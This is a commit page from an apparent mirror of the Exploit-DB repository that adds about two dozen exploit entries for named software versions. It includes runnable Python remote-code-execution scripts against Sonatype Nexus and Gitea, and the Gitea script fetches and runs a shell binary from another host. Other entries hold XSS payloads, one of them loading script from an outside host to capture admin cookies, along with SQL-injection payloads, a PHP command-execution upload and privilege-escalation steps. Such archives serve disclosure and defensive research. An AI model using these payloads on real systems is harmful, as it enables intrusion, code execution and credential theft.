bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-01-07

Browse source 
23 changes to exploits/shellcodes

dirsearch 0.4.1 - CSV Injection
IObit Uninstaller 10 Pro - Unquoted Service Path
WinAVR Version 20100110 - Insecure Folder Permissions
PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation
H2 Database 1.4.199 - JNI Code Execution

Responsive ELearning System 1.0 - 'id' Sql Injection
Responsive E-Learning System 1.0 - 'id' Sql Injection
Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF)
IPeakCMS 3.5 - Boolean-based blind SQLi
Expense Tracker 1.0 - 'Expense Name' Stored Cross-Site Scripting
WordPress Plugin litespeed cache 3.6 - 'server_ip' Cross-Site Scripting
Responsive E-Learning System 1.0 - Unrestricted File Upload to RCE
Responsive E-Learning System 1.0 - Stored Cross Site Scripting
WordPress Plugin WP24 Domain Check 1.6.2 - 'fieldnameDomain' Stored Cross Site Scripting
Newgen Correspondence Management System (corms) eGov 12.0 - IDOR
Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated)
Resumes Management and Job Application Website 1.0 - Multiple Stored XSS
Gitea 1.7.5 - Remote Code Execution
Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
This commit is contained in:
Offensive Security 2021-01-07 05:01:58 +00:00
parent 2c7e8b1ddc
commit e95d9f2c13
24 changed files with 939 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

23
exploits/java/local/49384.txt Normal file
View file

File diff suppressed because one or more lines are too long

59
exploits/java/webapps/49385.py Executable file
View file

@ -0,0 +1,59 @@
# Exploit Title: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
# Exploit Author: 1F98D
# Original Author: Alvaro Muñoz
# Date: 27 May 2020
# Vendor Hompage: https://www.sonatype.com/
# CVE: CVE-2020-10199
# Tested on: Windows 10 x64
# References:
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
#
# Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable
# to Java EL injection which allows a low privilege user to remotely
# execute code on the target server.
#
#!/usr/bin/python3
import sys
import base64
import requests
URL='http://192.168.1.1:8081'
CMD='cmd.exe /c calc.exe'
USERNAME='admin'
PASSWORD='password'
s = requests.Session()
print('Logging in')
body = {
'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'),
'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8')
}
r = s.post(URL + '/service/rapture/session',data=body)
if r.status_code != 204:
print('Login unsuccessful')
print(r.status_code)
sys.exit(1)
print('Logged in successfully')
body = {
'name': 'internal',
'online': True,
'storage': {
'blobStoreName': 'default',
'strictContentTypeValidation': True
},
'group': {
'memberNames': [
'$\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"'
]
},
}
r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body)
if 'java.lang.ProcessImpl' in r.text:
print('Command executed')
sys.exit(0)
else:
print('Error executing command, the following was returned by Nexus')
print(r.text)

1
exploits/multiple/webapps/49093.txt
View file

@ -4,6 +4,7 @@
# Vendor Homepage: https://www.nopcommerce.com/
# Version: 4.30
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29475
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.

1
exploits/multiple/webapps/49188.txt
View file

@ -5,6 +5,7 @@
# Software Link: https://invisioncommunity.com/buy
# Version: 4.5.4
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29477
Vulnerable Parameters: Profile - Field Name.

15
exploits/multiple/webapps/49372.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: IPeakCMS 3.5 - Boolean-based blind SQLi
# Date: 07.12.2020
# Exploit Author: MoeAlbarbari
# Vendor Homepage: https://ipeak.ch/
# Software Link: N/A
# Version: 3.5
# Tested on: BackBox Linux
# CVE : CVE-2021-3018
Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version 
Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print  e.g: site.com/cms/print.php?id=1
Parameter: id (GET based)
Use SQLmap if you've found the valid id...
e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs
Payload : id=(SELECT (CASE WHEN(3104=3104) THEN 1 ELSE (SELECT 8458) END))

23
exploits/multiple/webapps/49378.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: Newgen Correspondence Management System (corms) eGov 12.0 - IDOR
# Date: 29 Dec 2020
# Exploit Author: ALI AL SINAN
# Vendor Homepage: https://newgensoft.com
# Software Link: https://newgensoft.com/solutions/industries/government/e-gov-office/
# Version: eGov 12.0
# Tested on: JBoss EAP 7
# CVE : CVE-2020-35737
-----------------------------------------------------
Description:
Correspondence management is the process of handling official incoming and outgoing correspondence in government agencies. The word “correspondence” in this context refers to physical letters, direct e-delivery, emails and faxes along with all their attachments that are received by the government agencies.
-----------------------------------------------------
Vulnerability:
Affected URL:
http://server/corms/dist/#/web/home/workdesk/inbox
Vulnerability Description:
user can manipulate parameter “UserIndex” in personal setting page. this parameter can allow un-authorized access to view or change other user's personal information.

126
exploits/multiple/webapps/49383.py Executable file
View file

@ -0,0 +1,126 @@
# Exploit Title: Gitea 1.7.5 - Remote Code Execution
# Date: 2020-05-11
# Exploit Author: 1F98D
# Original Author: LoRexxar
# Software Link: https://gitea.io/en-us/
# Version: Gitea before 1.7.6 and 1.8.x before 1.8-RC3
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2019-11229
# References:
# https://medium.com/@knownsec404team/analysis-of-cve-2019-11229-from-git-config-to-rce-32c217727baa
#
# Gitea before 1.7.6 and 1.8.x before 1.8-RC3 mishandles mirror repo URL settings,
# leading to authenticated remote code execution.
#
#!/usr/bin/python3
import re
import os
import sys
import random
import string
import requests
import tempfile
import threading
import http.server
import socketserver
import urllib.parse
from functools import partial
USERNAME = "test"
PASSWORD = "password123"
HOST_ADDR = '192.168.1.1'
HOST_PORT = 3000
URL = 'http://192.168.1.2:3000'
CMD = 'wget http://192.168.1.2:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell'
# Login
s = requests.Session()
print('Logging in')
body = {
'user_name': USERNAME,
'password': PASSWORD
}
r = s.post(URL + '/user/login',data=body)
if r.status_code != 200:
print('Login unsuccessful')
sys.exit(1)
print('Logged in successfully')
# Obtain user ID for future requests
print('Retrieving user ID')
r = s.get(URL + '/')
if r.status_code != 200:
print('Could not retrieve user ID')
sys.exit(1)
m = re.compile("<meta name=\"_uid\" content=\"(.+)\" />").search(r.text)
USER_ID = m.group(1)
print('Retrieved user ID: {}'.format(USER_ID))
# Hosting the repository to clone
gitTemp = tempfile.mkdtemp()
os.system('cd {} && git init'.format(gitTemp))
os.system('cd {} && git config user.email x@x.com && git config user.name x && touch x && git add x && git commit -m x'.format(gitTemp))
os.system('git clone --bare {} {}.git'.format(gitTemp, gitTemp))
os.system('cd {}.git && git update-server-info'.format(gitTemp))
handler = partial(http.server.SimpleHTTPRequestHandler,directory='/tmp')
socketserver.TCPServer.allow_reuse_address = True
httpd = socketserver.TCPServer(("", HOST_PORT), handler)
t = threading.Thread(target=httpd.serve_forever)
t.start()
print('Created temporary git server to host {}.git'.format(gitTemp))
# Create the repository
print('Creating repository')
REPO_NAME = ''.join(random.choice(string.ascii_lowercase) for i in range(8))
body = {
'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),
'uid': USER_ID,
'repo_name': REPO_NAME,
'clone_addr': 'http://{}:{}/{}.git'.format(HOST_ADDR, HOST_PORT, gitTemp[5:]),
'mirror': 'on'
}
r = s.post(URL + '/repo/migrate', data=body)
if r.status_code != 200:
print('Error creating repo')
httpd.shutdown()
t.join()
sys.exit(1)
print('Repo "{}" created'.format(REPO_NAME))
# Inject command into config file
print('Injecting command into repo')
body = {
'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),
'mirror_address': 'ssh://example.com/x/x"""\r\n[core]\r\nsshCommand="{}"\r\na="""'.format(CMD),
'action': 'mirror',
'enable_prune': 'on',
'interval': '8h0m0s'
}
r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)
if r.status_code != 200:
print('Error injecting command')
httpd.shutdown()
t.join()
sys.exit(1)
print('Command injected')
# Trigger the command
print('Triggering command')
body = {
'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),
'action': 'mirror-sync'
}
r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)
if r.status_code != 200:
print('Error triggering command')
httpd.shutdown()
t.join()
sys.exit(1)
print('Command triggered')
# Shutdown the git server
httpd.shutdown()

1
exploits/php/webapps/49085.txt
View file

@ -4,6 +4,7 @@
# Vendor Homepage: https://www.wondercms.com/
# Version: 3.1.3
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29233
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.

1
exploits/php/webapps/49098.txt
View file

@ -5,6 +5,7 @@
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: 3.0.3.6
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29471
Vulnerable Parameters: Profile Image.

1
exploits/php/webapps/49099.txt
View file

@ -5,6 +5,7 @@
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: 3.0.3.6
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29470
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.

1
exploits/php/webapps/49164.txt
View file

@ -5,6 +5,7 @@
# Version: 3.1.3
# Tested on: Windows 10/Kali Linux
# Contact: https://www.linkedin.com/in/hemantsolo/
# CVE: CVE-2020-29469
Attack vector:
This vulnerability can results attacker to inject the XSS payload in the Setting - Menu and each time any user will visits the website directory, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.

16
exploits/php/webapps/49369.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF)
# Date: 06/01/2021
# Exploit Author: Rahul Ramakant Singh
# Vendor Homepage: https://www.awbs.com/
# Version: 3.7.0
# Tested on Windows
Steps:
1. Login into the application with the help of email and password.
2. Navigate to my additional contact page and add one contact for the same
3. Now there is option for delete the contact from the list.
4. Now Logout from the application and same create a one CSRF POC having having action of delete contact and same blank the token value from CSRF POC.
5. Now again login into the application and Send a link of this crafted page(generated CSRF POC) to the victim.
6. When the victim user opens the link, a script present on the crafted page sends a request for delete of contact to the server with an active session ID of the victim and accept the blank token value from the request.
7. Contact successfully deleted.

22
exploits/php/webapps/49373.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: Expense Tracker 1.0 - 'Expense Name' Stored Cross-Site Scripting
# Exploit Author: Shivam Verma(cyb3r_n3rd)
# Date: 2021-01-05
# Vendor Homepage: https://code-projects.org/expense-tracker-in-php-with-source-code/
# Software Link: https://code-projects.org
# Version: 1.0
# Category: Web Application
# Tested on: Kali Linux
# Contact: https://www.linkedin.com/in/shivam413
Attack Vector: This Vulnerability Leads an Attacker to Inject Malicious Payloads in Expense Category section and Paste the Payload in the Desired field each time admin/user visits and manages the user data, The Malicious Payload(XSS) triggers and attacker can capture the admin cookies and access the users Data in Plain Text
Step 1. Install The Software
Step 2. Click on Add Expense Category
Step 3. Now paste your Xss Payload in the Parameter(Expense Name)
Step 4. Click on Add
Step 5. Wait for the Administrator to click on Your link
Step 6. You will receive Admin Cookie Every time he Process the Request
---
XSS Payload: "><script src=https://.xss.ht></script>

33
exploits/php/webapps/49374.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: WordPress Plugin litespeed-cache 3.6 - 'server_ip' Cross-Site Scripting
# Date: 20-12-2020
# Software Link: https://downloads.wordpress.org/plugin/litespeed-cache.3.6.zip
# Version: litespeed-cache
# Tested on: Windows 10 x64
# Description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins litespeed-cache 3.6
# One parameters(server_ip) have Cross-Site Scripting.
POST /wp-admin/admin.php?page=litespeed-general HTTP/1.1
Host: localhost
Content-Length: 374
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/wp-admin/admin.php?page=litespeed-general
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie:
wordpress_a5beef43d228c89cc1d954ec4fcadda1=admin%7C1609289111%7CM6c2pV6VbnD2OElpSET6Aw3GhKFJBGdgetyfHtqxJkC%7C27d97999284897d8645200c65a7f508dffef6a9184800b2905627ccbd4d71806;
wordpress_test_cookie=WP%20Cookie%20check;
_lscache_vary=9effc614452472ce40565e73d3f4301c;
wordpress_logged_in_a5beef43d228c89cc1d954ec4fcadda1=admin%7C1609289111%7CM6c2pV6VbnD2OElpSET6Aw3GhKFJBGdgetyfHtqxJkC%7Cd7e1a2a77822d410d7ebe2540b88dc68f908a031ceda6e884995ff419bfb6b38;
wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1609116311
Connection: close
LSCWP_CTRL=save-settings&LSCWP_NONCE=af21ea74b2&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dlitespeed-general&_settings-enroll%5B%5D=auto_upgrade&auto_upgrade=0&_settings-enroll%5B%5D=api_key&api_key=&_settings-enroll%5B%5D=server_ip&server_ip=%3Cscript%3Ealert%28%27Hoa%27%29%3C%2Fscript%3E&_settings-enroll%5B%5D=news&news=1&litespeed-submit=Save+Changes

13
exploits/php/webapps/49375.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: Responsive E-Learning System 1.0 - Unrestricted File Upload to RCE
# Date: 2020-12-24
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux
Step 1 - Login to the application with admin credentials.
Step 2 - Click on Student or go to http://localhost/elearning/admin/student.php
Step 3 - Click on Add Student and fill the required things.
Step 4 - In image upload any php reverse shell.
Step 5 - Visit "http://localhost/elearning/admin/uploads/" and select your uploaded PHP web shell.

16
exploits/php/webapps/49376.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: Responsive E-Learning System 1.0 Stored Cross Site Scripting
# Date: 2020-12-24
# Exploit Author: Kshitiz Raj(manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux
Step 1- Go to url http://localhost/elearning/admin/index.php
Step 2 Login as admin.
Step 3 Go to http://localhost/elearning/admin/course.php
Step 4 click on Edit course (any course)
Step 5 Enter *Course Year And Section:* as <script>alert()</script> and fill the other values.
Step 6 Click Save
XSS popup will be triggered.

49
exploits/php/webapps/49377.txt Normal file
View file

@ -0,0 +1,49 @@
# Exploit Title: WordPress Plugin WP24 Domain Check 1.6.2 - 'fieldnameDomain' Stored Cross Site Scripting
# Date: 2021-01-03
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Vendor Homepage: https://wordpress.org/plugins/wp24-domain-check/
# Software Link: https://wordpress.org/plugins/wp24-domain-check/
# Version: 1.6.2
# Tested on: Apache2 - Windows 10
Vulnerable param: wp24_domaincheck[fieldnameDomain]
-------------------------------------------------------------------------
POST /w12ee3/wp-admin/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/w12ee3/wp-admin/options-general.php?page=wp24_domaincheck_settings&tab=advanced
Content-Type: application/x-www-form-urlencoded
Content-Length: 415
Origin: http://localhost
Connection: close
Cookie: wordpress_a25e758b4b8611d32cffab04f654ade8=admin%7C1610108483%7C9JXQJh8k8MPmNowV0sLR7zP5q0hyjw2rpi8fp0wdZNa%7C9bd3e4806dbb6058ca887771af1d82b5d04ad6c3d14f8f6f88d9604ad12ae500; wordpress_logged_in_a25e758b4b8611d32cffab04f654ade8=admin%7C1610108483%7C9JXQJh8k8MPmNowV0sLR7zP5q0hyjw2rpi8fp0wdZNa%7C8edadaf3ba084ba1d6cb6257a460f043efde74e8bcd9817826faf9ad80271d1e; wp-settings-time-1=1609659595; bp_user-role=administrator; bp_user-registered=1608898152000; bp_ut_session=%7B-q-pageviews-q-%3A1-c--q-referrer-q-%3A-q--q--c--q-landingPage-q-%3A-q-http%3A%2F%2Flocalhost%2Fw12ee3%2F-q--c--q-started-q-%3A1609657029216%7D
Upgrade-Insecure-Requests: 1
update_advanced_settings=1&option_page=wp24_domaincheck&action=update&_wpnonce=8dcf91df50&_wp_http_referer=/w12ee3/wp-admin/options-general.php?page=wp24_domaincheck_settings&tab=advanced&wp24_domaincheck%5BhtmlForm%5D=1&wp24_domaincheck[fieldnameDomain]=111%22+onfocus%3Dalert%28document.cookie%29%3B+on%3D&wp24_domaincheck%5BfieldnameTld%5D=domaincheck_tld&submit=De%C4%9Fi%C5%9Fiklikleri+kaydet
Source Code:
\wp-content\plugins\wp24-domain-check\includes\class-wp24-settings.php:
--------------------------------------------------------------------
// fieldnameDomain
add_settings_field(
'fieldnameDomain',
__( 'Domain fieldname', 'wp24-domaincheck' ),
array( $this, 'inputfield' ),
'settings_advanced',
'section_advanced_form',
array(
'name' => 'fieldnameDomain',
'type' => 'textfield',
)
);
Vulnerable: 'name' => 'fieldnameDomain'
-------------------------------------------------------------------------
Payload:
111" onfocus=alert(document.cookie); on=
-------------------------------------------------------------------------

19
exploits/php/webapps/49380.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated)
# Date: 3/1/2021
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://egavilanmedia.com
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: linux/lamp
Submit rce.php in resume file upload unauthenticated.
Contents of rce.php
<?php
$output = shell_exec('whoami');
echo "<h1>$output</h1>";
?>
Navigate to http://localhost/Resumes Management and Job Application
Website/files/rce.php
You will get the output of whoami

12
exploits/php/webapps/49381.txt Normal file
View file

@ -0,0 +1,12 @@
# Exploit Title: Resumes Management and Job Application Website 1.0 - Multiple Stored XSS
# Date: 2/1/2021
# Exploit Author: Saswat Subhajyoti Mallick
# Vendor Homepage: https://egavilanmedia.com/
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: windows 10/wamp
Attacker can put stored xss and gain admin access unauthenticated .
For stored XSS poc simply put <script>alert(1)</script> in first name,last name and address field while applying for resume.
Stored XSS will be activated the moment admin user logs in.

57
exploits/python/local/49370.txt Normal file
View file

@ -0,0 +1,57 @@
# Exploit Title: dirsearch 0.4.1 - CSV Injection
# Author: Dolev Farhi
# Date: 2021-01-05
# Vendor Homepage: https://github.com/maurosoria/dirsearch
# Version : 0.4.1
# Tested on: Debian 9.13
dirsearch, when used with the --csv-report flag, writes the results of crawled endpoints which redirect(, to a csv file without sanitization.
A malicious server can redirect all of its routes/paths to a path that contains a comma and formula, e.g. /test,=1336+1, and escape the normal dirsearch CSV structure to inject its own formula.
Malicious Flask Webserver:
"""
from flask import Flask, redirect
app = Flask(__name__)
@app.route('/')
def index():
return redirect('/test,=1336+1')
@app.route('/admin')
def admin():
return redirect('/test,=1336+1')
@app.route('/login')
def login():
return redirect('/test,=1336+1')
"""
2. Tester runs dirsearch
root@host:~/# python3 dirsearch.py -u http://10.0.0.1 --csv-report=report.csv
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm, js | HTTP method: GET | Threads: 30 | Wordlist size: 2
Error Log: /root/tools/dirsearch/logs/errors-21-01-06_04-29-10.log
Target: http://10.0.0.1
Output File: /root/tools/dirsearch/reports/10.0.0.1/_21-01-06_04-29-10.txt
[04:29:10] Starting:
[04:29:11] 302 - 233B - /admin -> http://10.0.0.1/test,=1336+1
[04:29:11] 302 - 233B - /login -> http://10.0.0.1/test,=1336+1
3. Result CSV
root@host:~/# cat report.csv
Time,URL,Status,Size,Redirection
Wed Jan 6 04:29:11 2021,http://10.0.0.1:80/admin,302,233,http://10.0.0.1/test,=1336+1
Wed Jan 6 04:29:11 2021,http://10.0.0.1:80/login,302,233,http://10.0.0.1/test,=1336+1

38
exploits/windows/local/49371.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: IObit Uninstaller 10 Pro - Unquoted Service Path
# Date: 20201224
# Exploit Author: Mayur Parmar(th3cyb3rc0p)
# Vendor Homepage: https://www.iobit.com
# Software Link: https://www.iobit.com/en/advanceduninstaller.php
# Version: 10
# Tested on Windows 10
Unquoted Service Path:
When a service is created whose executable path contains spaces and isnt enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
In Windows, if the service is not enclosed within quotes and is having spaces, it would handle the space as a break and pass the rest of the service path as an argument.
Attack Vector:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
Steps to reproduce:
C:\Windows\system32>sc qc IObitUnSvr
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: IObitUnSvr
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : IObit Uninstaller Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Mitigation:Ensure that any services that contain a space in the path enclose the path in quotes.
Reference:
-> https://www.rapid7.com/db/modules/exploit/windows/local/unquoted_service_path/
-> https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae
-> https://www.hackingarticles.in/windows-privilege-escalation-unquoted-path-service/
-> https://sec-consult.com/blog/detail/windows-privilege-escalation-an-approach-for-penetration-testers/

331
exploits/windows/local/49379.txt Normal file
View file

@ -0,0 +1,331 @@
# Exploit Title: WinAVR Version 20100110 - Insecure Folder Permissions
# Date: 2020-12-11
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://sourceforge.net/projects/winavr/
# Software Link: https://sourceforge.net/projects/winavr/files/WinAVR/20100110/WinAVR-20100110-install.exe
# Version: Version 20100110
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Info:
PS C:\WinAVR-20100110\bin> icacls.exe .
. BUILTIN\Administrators:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 files
PS C:\WinAVR-20100110\bin> icacls.exe *.dll
cygwin1.dll BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
itcl32.dll BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
itk32.dll BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
libusb0.dll BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
tcl84.dll BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
tclpip84.dll BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
tk84.dll BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 7 files; Failed processing 0 files
PS C:\WinAVR-20100110\bin> icacls.exe *.exe
avarice.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-addr2line.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-ar.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-as.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-c++.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-c++filt.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-cpp.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-g++.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-gcc-4.3.3.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-gcc.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-gcov.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-gdb.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-gprof.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-insight.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-ld.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-nm.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-objcopy.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-objdump.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-ranlib.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-readelf.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-size.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-strings.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
